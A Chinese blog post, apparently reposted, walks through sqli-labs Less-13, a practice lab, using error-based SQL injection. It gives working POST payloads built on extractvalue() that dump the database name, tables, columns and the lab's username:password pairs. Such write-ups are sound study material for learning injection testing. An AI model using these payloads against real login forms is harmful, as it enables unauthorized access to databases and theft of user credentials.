码迷,mamicode.com
首页 > 其他好文 > 详细

Less(13) POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

时间:2020-02-11 18:59:45      阅读:76      评论:0      收藏:0      [点我收藏+]

标签:sub   rom   image   mamicode   tab   secure   没有   failed   bsp   

1.发现没有登录成功的返回信息,看来要盲注了

  技术图片

 

 2.报错型:extractvalue()

  (1)爆库:uname=admin‘) and extractvalue(1,concat(0x7e,(select database())))  and (‘ &passwd=admin&submit=Submit

    技术图片

  (2)爆表:uname=admin‘) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))  and (‘ &passwd=admin&submit=Submit

    技术图片  

  (3)爆列名:uname=admin‘) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘)))  and (‘ &passwd=admin&submit=Submit

    技术图片

 

     因为没有咱们需要的password,username,把一些不需要的列名消除掉:uname=admin‘) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘ and column_name not in(‘user_id‘,‘first_name‘,‘last_name‘,‘user‘,‘avatar‘,‘last_login‘,‘failed_login‘))))  and (‘ &passwd=admin&submit=Submit

    技术图片

 

     我们发现后面确实有咱们需要的password,username

  (4)爆值:uname=admin‘) and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))   and (‘ &passwd=admin&submit=Submit

    技术图片

 

     通过 not in(),我们可以找到所有的用户名和密码:、

    Dumb:Dumb    Angelinal:I-kill-you   Dummy:p@ssword   secure:crappy   stupid:stupidiry   superman:genious   batman:mob!le   admin:admin   admin1:admin1   admin2:admin2   admin3:admin3   dhakkan:dumbo   admin4:admin4

3.时间型盲注

  这种方法有点费时间,这个参照之前的;

  

Less(13) POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

标签:sub   rom   image   mamicode   tab   secure   没有   failed   bsp   

原文地址:https://www.cnblogs.com/meng-yu37/p/12296172.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!